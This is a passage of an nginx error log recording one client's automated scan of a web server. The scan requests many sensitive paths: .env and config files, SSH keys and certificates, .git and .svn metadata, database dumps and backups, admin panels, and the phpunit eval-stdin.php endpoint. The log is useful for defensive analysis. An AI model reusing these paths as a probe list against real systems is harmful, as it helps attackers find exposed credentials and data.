185.177.72.56, server: terminal.profibot.hu, request: "GET /config/logging.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/broadcasting.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/views/errors/500.blade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/views/errors/404.blade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/views/welcome.blade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_debugbar/open HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debugbar HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /xdebug.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /xdebug_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/symfony/debug/debug.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/composer/installed.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/autoload.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /artisan HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_socket.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testdb.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /errors.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /export.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /adminer-4.2.5-mysql-en.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpmyadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpmyadmin/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpmyadmin/setup/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sql.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sqladmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dbadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpminiadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mysqladmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup/database.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /database.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dump.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /data.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup.tar HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /database.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /db_backup.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /database_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.config/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.docker/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /node_modules/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tmp/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /core/config.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config-sample.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wordpress/wp-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wordpress/wp-config-sample.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.git/HEAD HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.svn/entries HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.hg/hgrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.DS_Store HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.htpasswd HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.bash_history HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.bashrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /id_rsa HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /id_rsa.pub HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /key.pem HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /public.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:18 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ssl.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cert.pem HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /selfsigned.crt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /selfsigned.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /nginx.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /httpd.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /docker-compose.override.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Dockerfile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.nvmrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.yarnrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.rbenv-vars HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /WEB-INF/web.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /META-INF/context.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/settings.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/db.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/db.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/sql.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/.env.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/adminer.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/sqladmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/phpmyadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/secret.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private/secret.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secret.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/secrets.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.well-known/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.well-known/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.well-known/credentials.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /install.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /setup.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /setup-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:19 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /configuration.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app_dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config_dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /index-dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /index-test.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dev/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /maintenance.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /maintenance.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /under-construction.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /down.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.maintenance HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /install/install.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /setup/setup.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /setup/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /upgrade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /upgrade/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /upgrader.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /migrate.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /migration.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /console.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /scripts/install.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /scripts/db.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /scripts/deploy.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logs.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /deploy.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /init.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /install.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /uninstall.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /remove.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /install.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /update.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:20 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /delete.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sample.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /example.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /example-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sample-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/plugin-qiankun/examples/app2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:21 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 